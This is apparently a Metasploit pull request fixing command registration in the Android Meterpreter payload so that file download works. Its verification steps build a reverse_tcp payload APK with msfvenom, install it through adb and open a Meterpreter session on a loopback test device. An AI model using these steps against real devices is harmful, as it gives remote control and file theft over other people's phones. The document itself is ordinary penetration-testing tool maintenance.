### PR TITLE
fix Android stdapi_channel_open

### DIFF
--- a/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
@@ -122,15 +122,17 @@ public class AndroidMeterpreter extends Meterpreter {
         mgr.registerCommand(CommandId.STDAPI_FS_MD5, stdapi_fs_md5.class);
         mgr.registerCommand(CommandId.STDAPI_FS_SEARCH, stdapi_fs_search.class);
         mgr.registerCommand(CommandId.STDAPI_FS_SEPARATOR, stdapi_fs_separator.class);
-        mgr.registerCommand(CommandId.STDAPI_FS_STAT, stdapi_fs_stat.class);
+        mgr.registerCommand(CommandId.STDAPI_FS_STAT, stdapi_fs_stat_V1_6.class);
         mgr.registerCommand(CommandId.STDAPI_FS_SHA1, stdapi_fs_sha1.class);
-        mgr.registerCommand(CommandId.STDAPI_NET_CONFIG_GET_INTERFACES, stdapi_net_config_get_interfaces_V1_4.class);
+        mgr.registerCommand(CommandId.STDAPI_NET_CONFIG_GET_INTERFACES, stdapi_net_config_get_interfaces_V1_6.class);
         mgr.registerCommand(CommandId.STDAPI_NET_CONFIG_GET_ROUTES, stdapi_net_config_get_routes_V1_4.class);
         mgr.registerCommand(CommandId.STDAPI_NET_SOCKET_TCP_SHUTDOWN, stdapi_net_socket_tcp_shutdown_V1_3.class);
+        mgr.registerCommand(CommandId.STDAPI_SYS_CONFIG_GETENV, stdapi_sys_config_getenv.class);
         mgr.registerCommand(CommandId.STDAPI_SYS_CONFIG_GETUID, stdapi_sys_config_getuid.class);
         mgr.registerCommand(CommandId.STDAPI_SYS_CONFIG_SYSINFO, stdapi_sys_config_sysinfo_android.class);
         mgr.registerCommand(CommandId.STDAPI_SYS_CONFIG_LOCALTIME, stdapi_sys_config_localtime.class);
         mgr.registerCommand(CommandId.STDAPI_SYS_PROCESS_EXECUTE, stdapi_sys_process_execute_V1_3.class);
+        mgr.registerCommand(CommandId.STDAPI_SYS_PROCESS_CLOSE, stdapi_sys_process_close.class);
         mgr.registerCommand(CommandId.STDAPI_SYS_PROCESS_GET_PROCESSES, stdapi_sys_process_get_processes_android.class);
         mgr.registerCommand(CommandId.STDAPI_UI_DESKTOP_SCREENSHOT, stdapi_ui_desktop_screenshot.class);
         if (context != null) {

--- a/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
@@ -109,6 +109,7 @@ public class AndroidMeterpreter extends Meterpreter {
         getCommandManager().resetNewCommands();
         CommandManager mgr = getCommandManager();
         Loader.setCWD(new File(writeableDir));
+        mgr.registerCommand(CommandId.CORE_CHANNEL_OPEN, stdapi_channel_open.class);
         mgr.registerCommand(CommandId.STDAPI_FS_CHDIR, stdapi_fs_chdir.class);
         mgr.registerCommand(CommandId.STDAPI_FS_DELETE_DIR, stdapi_fs_delete_dir.class);
         mgr.registerCommand(CommandId.STDAPI_FS_DELETE_FILE, stdapi_fs_delete_file.class);

--- a/java/version-compatibility-check/android-api/pom.xml
+++ b/java/version-compatibility-check/android-api/pom.xml
@@ -45,8 +45,6 @@
 								<copy todir="${project.basedir}/target/generated-sources/copy">
 									<fileset dir="${project.basedir}/../java16/target/generated-sources/copy">
 										<include name="**/*.java" />
-										<exclude name="**/stdapi_net_config_get_interfaces_V1_6.java" />
-										<exclude name="**/stdapi_fs_stat_V1_6.java" />
 										<exclude name="**/stdapi_ui_desktop_screenshot_V1_4.java" />
 										<exclude name="**/stdapi_ui_send_mouse_V1_4.java" />
 										<exclude name="**/stdapi_ui_send_keyevent_V1_4.java" />


### PR DESCRIPTION
Fix https://github.com/rapid7/metasploit-framework/issues/14534 and https://github.com/rapid7/metasploit-framework/issues/14535

The stdapi_channel_open command registration is missing on Android which causes `meterpreter > download` to fail.

## Verification

- [ ] Get an Android meterpreter session (via adb):
```
msfvenom -p android/meterpreter/reverse_tcp SessionRetryWait=2 LHOST=127.0.0.1 LPORT=4444 -o met.apk
adb install met.apk
adb reverse tcp:4444 tcp:4444
adb shell am startservice com.metasploit.stage/.MainService
msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; setg lhost 127.0.0.1; set lport 4444; set ExitOnSession false; run -j"
```
- [ ] Try `meterpreter > download`
```
meterpreter > download lol
[*] Downloading: lol -> lol
[-] 4: Operation failed: 1
meterpreter >
```

## After fix:
```
meterpreter > download lol
[*] Downloading: lol -> lol
[*] Downloaded 6.00 B of 6.00 B (100.0%): lol -> lol
[*] download   : lol -> lol
meterpreter >
```